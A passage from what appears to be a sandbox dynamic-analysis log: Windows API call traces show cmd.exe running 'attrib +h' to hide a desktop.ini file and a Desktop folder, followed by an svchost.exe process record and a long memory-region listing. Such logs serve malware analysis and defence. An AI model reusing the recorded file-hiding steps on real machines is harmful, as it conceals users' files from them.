lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.486] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.562] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.563] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0223.563] _close (_FileHandle=3) returned 0 [0223.563] GetConsoleTitleW (in: lpConsoleTitle=0x2af1a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.564] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0223.564] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0223.564] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0223.564] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.564] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.565] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0223.565] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0223.565] GetConsoleTitleW (in: lpConsoleTitle=0x2aef3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.565] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aedc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aee8c | out: lpAttributeList=0x2aedc4, lpSize=0x2aee8c) returned 1 [0223.565] UpdateProcThreadAttribute (in: lpAttributeList=0x2aedc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aedc4, lpPreviousValue=0x0) returned 1 [0223.565] GetStartupInfoW (in: lpStartupInfo=0x2aed80 | out: lpStartupInfo=0x2aed80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0223.565] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0223.565] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aee6c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", lpProcessInformation=0x2aee6c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd8c, dwThreadId=0xdb0)) returned 1 [0223.567] CloseHandle (hObject=0x50) returned 1 [0223.567] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0223.567] GetEnvironmentStringsW () returned 0x332cb0* [0223.568] FreeEnvironmentStringsW (penv=0x332cb0) returned 1 [0223.568] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0223.831] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2aed60 | out: lpExitCode=0x2aed60*=0x0) returned 1 [0223.831] CloseHandle (hObject=0x4c) returned 1 [0223.831] _vsnwprintf (in: _Buffer=0x2aeea8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aed6c | out: _Buffer="00000000") returned 8 [0223.831] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0223.831] GetEnvironmentStringsW () returned 0x332cb0* [0223.831] FreeEnvironmentStringsW (penv=0x332cb0) returned 1 [0223.831] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.831] GetEnvironmentStringsW () returned 0x332cb0* [0223.831] FreeEnvironmentStringsW (penv=0x332cb0) returned 1 [0223.831] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aedc4 | out: lpAttributeList=0x2aedc4) [0223.831] GetConsoleTitleW (in: lpConsoleTitle=0x2af1a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.831] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0223.831] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0223.831] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0223.832] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.832] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.832] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0223.832] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0223.832] GetConsoleTitleW (in: lpConsoleTitle=0x2aef3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.832] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aedc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aee8c | out: lpAttributeList=0x2aedc4, lpSize=0x2aee8c) returned 1 [0223.832] UpdateProcThreadAttribute (in: lpAttributeList=0x2aedc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aedc4, lpPreviousValue=0x0) returned 1 [0223.832] GetStartupInfoW (in: lpStartupInfo=0x2aed80 | out: lpStartupInfo=0x2aed80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0223.832] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0223.832] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aee6c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", lpProcessInformation=0x2aee6c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdc0, dwThreadId=0x5e0)) returned 1 [0223.834] CloseHandle (hObject=0x4c) returned 1 [0223.834] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0223.834] GetEnvironmentStringsW () returned 0x333668* [0223.834] FreeEnvironmentStringsW (penv=0x333668) returned 1 [0223.834] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0223.910] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aed60 | out: lpExitCode=0x2aed60*=0x0) returned 1 [0223.910] CloseHandle (hObject=0x50) returned 1 [0223.910] _vsnwprintf (in: _Buffer=0x2aeea8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aed6c | out: _Buffer="00000000") returned 8 [0223.910] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0223.910] GetEnvironmentStringsW () returned 0x333668* [0223.910] FreeEnvironmentStringsW (penv=0x333668) returned 1 [0223.910] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.910] GetEnvironmentStringsW () returned 0x333668* [0223.911] FreeEnvironmentStringsW (penv=0x333668) returned 1 [0223.911] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aedc4 | out: lpAttributeList=0x2aedc4) [0223.911] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.911] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0223.911] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.911] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0223.911] _get_osfhandle (_FileHandle=0) returned 0x3 [0223.911] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0223.911] SetConsoleInputExeNameW () returned 0x1 [0223.911] GetConsoleOutputCP () returned 0x1b5 [0223.911] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0223.911] SetThreadUILanguage (LangId=0x0) returned 0x409 [0223.911] exit (_Code=0) Process: id = "582" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16160" os_pid = "0x2c4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "298" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a37b" [0xc000000f], "LOCAL" [0x7] Region: id = 33296 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33297 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33298 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 33299 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 33300 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 33301 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33302 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 33303 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 33304 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 33305 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33306 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 33307 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 33308 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 33309 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 33310 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 33311 start_va = 0x440000 end_va = 0x4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 33312 start_va = 0x4c0000 end_va = 0x8b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 33313 start_va = 0x8c0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 33314 start_va = 0x8e0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 33315 start_va = 0x900000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 33316 start_va = 0x920000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 33317 start_va = 0x940000 end_va = 0x940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 33318 start_va = 0x950000 end_va = 0x950fff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 33319 start_va = 0x960000 end_va = 0x961fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 33320 start_va = 0x970000 end_va = 0x970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 33321 start_va = 0x980000 end_va = 0x980fff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 33322 start_va = 0x9a0000 end_va = 0x9e0fff entry_point = 0x9a0000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 33323 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 33324 start_va = 0xa00000 end_va = 0xa3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 33325 start_va = 0xa40000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 33326 start_va = 0xb80000 end_va = 0xe4efff entry_point = 0xb80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 33327 start_va = 0xe50000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 33328 start_va = 0xe90000 end_va = 0xe90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 33329 start_va = 0xea0000 end_va = 0xea1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 33330 start_va = 0xeb0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 33331 start_va = 0xef0000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 33332 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 33333 start_va = 0xf60000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 33334 start_va = 0xfe0000 end_va = 0xfe7fff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 33335 start_va = 0xff0000 end_va = 0x1037fff entry_point = 0xff0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 33336 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 33337 start_va = 0x1090000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 33338 start_va = 0x10d0000 end_va = 0x1117fff entry_point = 0x10d0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 33339 start_va = 0x1150000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 33340 start_va = 0x1260000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 33341 start_va = 0x12e0000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 33342 start_va = 0x1440000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 33343 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 33344 start_va = 0x1500000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 33345 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 33346 start_va = 0x1650000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 33347 start_va = 0x16d0000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 33348 start_va = 0x1730000 end_va = 0x176ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 33349 start_va = 0x17a0000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 33350 start_va = 0x17e0000 end_va = 0x19dffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 33351 start_va = 0x19e0000 end_va = 0x1ddffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 33352 start_va = 0x1e40000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 33353 start_va = 0x1e90000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 33354 start_va = 0x1ed0000 end_va = 0x22d1fff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 33355 start_va = 0x22f0000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 33356 start_va = 0x2420000 end_va = 0x245ffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 33357 start_va = 0x24b0000 end_va = 0x24effff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 33358 start_va = 0x2500000 end_va = 0x253ffff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 33359 start_va = 0x2540000 end_va = 0x25bffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 33360 start_va = 0x6dee0000 end_va = 0x6df6bfff entry_point = 0x6dee0000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 33361 start_va = 0x6df70000 end_va = 0x6e05afff entry_point = 0x6df70000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 33362 start_va = 0x6e460000 end_va = 0x6e474fff entry_point = 0x6e460000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 33363 start_va = 0x6e560000 end_va = 0x6e595fff entry_point = 0x6e560000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 33364 start_va = 0x6e710000 end_va = 0x6e723fff entry_point = 0x6e710000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 33365 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 33366 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 33367 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 33368 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 33369 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 33370 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 33371 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 33372 start_va = 0x73720000 end_va = 0x73750fff entry_point = 0x73720000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 33373 start_va = 0x73760000 end_va = 0x7379ffff entry_point = 0x73760000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 33374 start_va = 0x737b0000 end_va = 0x737b5fff entry_point = 0x737b0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 33375 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 33376 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 33377 start_va = 0x737f0000 end_va = 0x737f7fff entry_point = 0x737f0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 33378 start_va = 0x73b40000 end_va = 0x73b46fff entry_point = 0x73b40000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 33379 start_va = 0x73b50000 end_va = 0x73b74fff entry_point = 0x73b50000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 33380 start_va = 0x73b80000 end_va = 0x73bf9fff entry_point = 0x73b80000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 33381 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file 